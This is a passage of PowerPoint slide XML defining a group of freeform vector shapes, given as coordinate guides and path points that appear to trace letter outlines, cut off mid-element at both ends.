            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4283782" y="3670780"/>
              <a:ext cx="698930" cy="495075"/>
              <a:chOff x="4929188" y="3675063"/>
              <a:chExt cx="342900" cy="242887"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="411" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4935538" y="3678238"/>
                <a:ext cx="69850" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 195"/>
                  <a:gd name="T1" fmla="*/ 167 h 239"/>
                  <a:gd name="T2" fmla="*/ 26 w 195"/>
                  <a:gd name="T3" fmla="*/ 238 h 239"/>
                  <a:gd name="T4" fmla="*/ 0 w 195"/>
                  <a:gd name="T5" fmla="*/ 238 h 239"/>
                  <a:gd name="T6" fmla="*/ 79 w 195"/>
                  <a:gd name="T7" fmla="*/ 0 h 239"/>
                  <a:gd name="T8" fmla="*/ 114 w 195"/>
                  <a:gd name="T9" fmla="*/ 0 h 239"/>
                  <a:gd name="T10" fmla="*/ 194 w 195"/>
                  <a:gd name="T11" fmla="*/ 238 h 239"/>
                  <a:gd name="T12" fmla="*/ 167 w 195"/>
                  <a:gd name="T13" fmla="*/ 238 h 239"/>
                  <a:gd name="T14" fmla="*/ 141 w 195"/>
                  <a:gd name="T15" fmla="*/ 167 h 239"/>
                  <a:gd name="T16" fmla="*/ 53 w 195"/>
                  <a:gd name="T17" fmla="*/ 167 h 239"/>
                  <a:gd name="T18" fmla="*/ 132 w 195"/>
                  <a:gd name="T19" fmla="*/ 141 h 239"/>
                  <a:gd name="T20" fmla="*/ 106 w 195"/>
                  <a:gd name="T21" fmla="*/ 70 h 239"/>
                  <a:gd name="T22" fmla="*/ 106 w 195"/>
                  <a:gd name="T23" fmla="*/ 70 h 239"/>
                  <a:gd name="T24" fmla="*/ 97 w 195"/>
                  <a:gd name="T25" fmla="*/ 26 h 239"/>
                  <a:gd name="T26" fmla="*/ 97 w 195"/>
                  <a:gd name="T27" fmla="*/ 26 h 239"/>
                  <a:gd name="T28" fmla="*/ 97 w 195"/>
                  <a:gd name="T29" fmla="*/ 26 h 239"/>
                  <a:gd name="T30" fmla="*/ 88 w 195"/>
                  <a:gd name="T31" fmla="*/ 70 h 239"/>
                  <a:gd name="T32" fmla="*/ 61 w 195"/>
                  <a:gd name="T33" fmla="*/ 141 h 239"/>
                  <a:gd name="T34" fmla="*/ 132 w 195"/>
                  <a:gd name="T35" fmla="*/ 141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95" h="239">
                    <a:moveTo>
                      <a:pt x="53" y="167"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="167"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="132" y="141"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="106" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="141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12" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5011738" y="3684588"/>
                <a:ext cx="34925" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 97"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 53 w 97"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 96 w 97"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 96 w 97"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 53 w 97"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 53 w 97"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 53 w 97"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 61 w 97"/>
                  <a:gd name="T15" fmla="*/ 195 h 231"/>
                  <a:gd name="T16" fmla="*/ 61 w 97"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 79 w 97"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 79 w 97"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 96 w 97"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 96 w 97"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 96 w 97"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 70 w 97"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 70 w 97"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 44 w 97"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 35 w 97"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 35 w 97"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 26 w 97"/>
                  <a:gd name="T39" fmla="*/ 195 h 231"/>
                  <a:gd name="T40" fmla="*/ 26 w 97"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 26 w 97"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 97"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 97"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 26 w 97"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 26 w 97"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 53 w 97"/>
                  <a:gd name="T53" fmla="*/ 0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97" h="231">
                    <a:moveTo>
                      <a:pt x="53" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53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13" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5053013" y="3684588"/>
                <a:ext cx="34925" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 98"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 53 w 98"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 97 w 98"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 97 w 98"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 53 w 98"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 53 w 98"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 53 w 98"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 62 w 98"/>
                  <a:gd name="T15" fmla="*/ 195 h 231"/>
                  <a:gd name="T16" fmla="*/ 71 w 98"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 80 w 98"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 80 w 98"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 97 w 98"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 97 w 98"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 97 w 98"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 71 w 98"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 71 w 98"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 53 w 98"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 36 w 98"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 36 w 98"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 27 w 98"/>
                  <a:gd name="T39" fmla="*/ 195 h 231"/>
                  <a:gd name="T40" fmla="*/ 27 w 98"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 27 w 98"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 98"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 98"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 27 w 98"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 27 w 98"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 53 w 98"/>
                  <a:gd name="T53" fmla="*/ 0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98" h="231">
                    <a:moveTo>
                      <a:pt x="53" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53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14" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5097463" y="3703638"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 133 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 133 h 178"/>
                  <a:gd name="T4" fmla="*/ 132 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 106 w 133"/>
                  <a:gd name="T7" fmla="*/ 168 h 178"/>
                  <a:gd name="T8" fmla="*/ 106 w 133"/>
                  <a:gd name="T9" fmla="*/ 150 h 178"/>
                  <a:gd name="T10" fmla="*/ 106 w 133"/>
                  <a:gd name="T11" fmla="*/ 150 h 178"/>
                  <a:gd name="T12" fmla="*/ 106 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 79 w 133"/>
                  <a:gd name="T15" fmla="*/ 168 h 178"/>
                  <a:gd name="T16" fmla="*/ 53 w 133"/>
                  <a:gd name="T17" fmla="*/ 177 h 178"/>
                  <a:gd name="T18" fmla="*/ 53 w 133"/>
                  <a:gd name="T19" fmla="*/ 177 h 178"/>
                  <a:gd name="T20" fmla="*/ 26 w 133"/>
                  <a:gd name="T21" fmla="*/ 168 h 178"/>
                  <a:gd name="T22" fmla="*/ 9 w 133"/>
                  <a:gd name="T23" fmla="*/ 159 h 178"/>
                  <a:gd name="T24" fmla="*/ 0 w 133"/>
                  <a:gd name="T25" fmla="*/ 142 h 178"/>
                  <a:gd name="T26" fmla="*/ 0 w 133"/>
                  <a:gd name="T27" fmla="*/ 124 h 178"/>
                  <a:gd name="T28" fmla="*/ 0 w 133"/>
                  <a:gd name="T29" fmla="*/ 124 h 178"/>
                  <a:gd name="T30" fmla="*/ 0 w 133"/>
                  <a:gd name="T31" fmla="*/ 97 h 178"/>
                  <a:gd name="T32" fmla="*/ 26 w 133"/>
                  <a:gd name="T33" fmla="*/ 80 h 178"/>
                  <a:gd name="T34" fmla="*/ 53 w 133"/>
                  <a:gd name="T35" fmla="*/ 62 h 178"/>
                  <a:gd name="T36" fmla="*/ 97 w 133"/>
                  <a:gd name="T37" fmla="*/ 62 h 178"/>
                  <a:gd name="T38" fmla="*/ 97 w 133"/>
                  <a:gd name="T39" fmla="*/ 62 h 178"/>
                  <a:gd name="T40" fmla="*/ 97 w 133"/>
                  <a:gd name="T41" fmla="*/ 62 h 178"/>
                  <a:gd name="T42" fmla="*/ 97 w 133"/>
                  <a:gd name="T43" fmla="*/ 36 h 178"/>
                  <a:gd name="T44" fmla="*/ 79 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 62 w 133"/>
                  <a:gd name="T47" fmla="*/ 18 h 178"/>
                  <a:gd name="T48" fmla="*/ 62 w 133"/>
                  <a:gd name="T49" fmla="*/ 18 h 178"/>
                  <a:gd name="T50" fmla="*/ 35 w 133"/>
                  <a:gd name="T51" fmla="*/ 18 h 178"/>
                  <a:gd name="T52" fmla="*/ 18 w 133"/>
                  <a:gd name="T53" fmla="*/ 36 h 178"/>
                  <a:gd name="T54" fmla="*/ 9 w 133"/>
                  <a:gd name="T55" fmla="*/ 9 h 178"/>
                  <a:gd name="T56" fmla="*/ 9 w 133"/>
                  <a:gd name="T57" fmla="*/ 9 h 178"/>
                  <a:gd name="T58" fmla="*/ 35 w 133"/>
                  <a:gd name="T59" fmla="*/ 0 h 178"/>
                  <a:gd name="T60" fmla="*/ 62 w 133"/>
                  <a:gd name="T61" fmla="*/ 0 h 178"/>
                  <a:gd name="T62" fmla="*/ 62 w 133"/>
                  <a:gd name="T63" fmla="*/ 0 h 178"/>
                  <a:gd name="T64" fmla="*/ 97 w 133"/>
                  <a:gd name="T65" fmla="*/ 0 h 178"/>
                  <a:gd name="T66" fmla="*/ 115 w 133"/>
                  <a:gd name="T67" fmla="*/ 18 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 44 h 178"/>
                  <a:gd name="T70" fmla="*/ 132 w 133"/>
                  <a:gd name="T71" fmla="*/ 62 h 178"/>
                  <a:gd name="T72" fmla="*/ 132 w 133"/>
                  <a:gd name="T73" fmla="*/ 133 h 178"/>
                  <a:gd name="T74" fmla="*/ 97 w 133"/>
                  <a:gd name="T75" fmla="*/ 80 h 178"/>
                  <a:gd name="T76" fmla="*/ 97 w 133"/>
                  <a:gd name="T77" fmla="*/ 80 h 178"/>
                  <a:gd name="T78" fmla="*/ 79 w 133"/>
                  <a:gd name="T79" fmla="*/ 89 h 178"/>
                  <a:gd name="T80" fmla="*/ 53 w 133"/>
                  <a:gd name="T81" fmla="*/ 89 h 178"/>
                  <a:gd name="T82" fmla="*/ 35 w 133"/>
                  <a:gd name="T83" fmla="*/ 97 h 178"/>
                  <a:gd name="T84" fmla="*/ 26 w 133"/>
                  <a:gd name="T85" fmla="*/ 124 h 178"/>
                  <a:gd name="T86" fmla="*/ 26 w 133"/>
                  <a:gd name="T87" fmla="*/ 124 h 178"/>
                  <a:gd name="T88" fmla="*/ 35 w 133"/>
                  <a:gd name="T89" fmla="*/ 133 h 178"/>
                  <a:gd name="T90" fmla="*/ 35 w 133"/>
                  <a:gd name="T91" fmla="*/ 142 h 178"/>
                  <a:gd name="T92" fmla="*/ 62 w 133"/>
                  <a:gd name="T93" fmla="*/ 150 h 178"/>
                  <a:gd name="T94" fmla="*/ 62 w 133"/>
                  <a:gd name="T95" fmla="*/ 150 h 178"/>
                  <a:gd name="T96" fmla="*/ 88 w 133"/>
                  <a:gd name="T97" fmla="*/ 142 h 178"/>
                  <a:gd name="T98" fmla="*/ 97 w 133"/>
                  <a:gd name="T99" fmla="*/ 124 h 178"/>
                  <a:gd name="T100" fmla="*/ 97 w 133"/>
                  <a:gd name="T101" fmla="*/ 124 h 178"/>
                  <a:gd name="T102" fmla="*/ 97 w 133"/>
                  <a:gd name="T103" fmla="*/ 115 h 178"/>
                  <a:gd name="T104" fmla="*/ 97 w 133"/>
                  <a:gd name="T105" fmla="*/ 80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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="133"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="133"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="8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15" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5157788" y="3703638"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 168 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 168 h 178"/>
                  <a:gd name="T4" fmla="*/ 114 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 88 w 133"/>
                  <a:gd name="T7" fmla="*/ 177 h 178"/>
                  <a:gd name="T8" fmla="*/ 88 w 133"/>
                  <a:gd name="T9" fmla="*/ 177 h 178"/>
                  <a:gd name="T10" fmla="*/ 53 w 133"/>
                  <a:gd name="T11" fmla="*/ 168 h 178"/>
                  <a:gd name="T12" fmla="*/ 26 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 9 w 133"/>
                  <a:gd name="T15" fmla="*/ 124 h 178"/>
                  <a:gd name="T16" fmla="*/ 0 w 133"/>
                  <a:gd name="T17" fmla="*/ 89 h 178"/>
                  <a:gd name="T18" fmla="*/ 0 w 133"/>
                  <a:gd name="T19" fmla="*/ 89 h 178"/>
                  <a:gd name="T20" fmla="*/ 9 w 133"/>
                  <a:gd name="T21" fmla="*/ 53 h 178"/>
                  <a:gd name="T22" fmla="*/ 26 w 133"/>
                  <a:gd name="T23" fmla="*/ 18 h 178"/>
                  <a:gd name="T24" fmla="*/ 53 w 133"/>
                  <a:gd name="T25" fmla="*/ 0 h 178"/>
                  <a:gd name="T26" fmla="*/ 97 w 133"/>
                  <a:gd name="T27" fmla="*/ 0 h 178"/>
                  <a:gd name="T28" fmla="*/ 97 w 133"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 114 w 133"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 132 w 133"/>
                  <a:gd name="T33" fmla="*/ 9 h 178"/>
                  <a:gd name="T34" fmla="*/ 132 w 133"/>
                  <a:gd name="T35" fmla="*/ 27 h 178"/>
                  <a:gd name="T36" fmla="*/ 132 w 133"/>
                  <a:gd name="T37" fmla="*/ 27 h 178"/>
                  <a:gd name="T38" fmla="*/ 114 w 133"/>
                  <a:gd name="T39" fmla="*/ 27 h 178"/>
                  <a:gd name="T40" fmla="*/ 97 w 133"/>
                  <a:gd name="T41" fmla="*/ 18 h 178"/>
                  <a:gd name="T42" fmla="*/ 97 w 133"/>
                  <a:gd name="T43" fmla="*/ 18 h 178"/>
                  <a:gd name="T44" fmla="*/ 70 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 44 w 133"/>
                  <a:gd name="T47" fmla="*/ 36 h 178"/>
                  <a:gd name="T48" fmla="*/ 35 w 133"/>
                  <a:gd name="T49" fmla="*/ 62 h 178"/>
                  <a:gd name="T50" fmla="*/ 35 w 133"/>
                  <a:gd name="T51" fmla="*/ 89 h 178"/>
                  <a:gd name="T52" fmla="*/ 35 w 133"/>
                  <a:gd name="T53" fmla="*/ 89 h 178"/>
                  <a:gd name="T54" fmla="*/ 35 w 133"/>
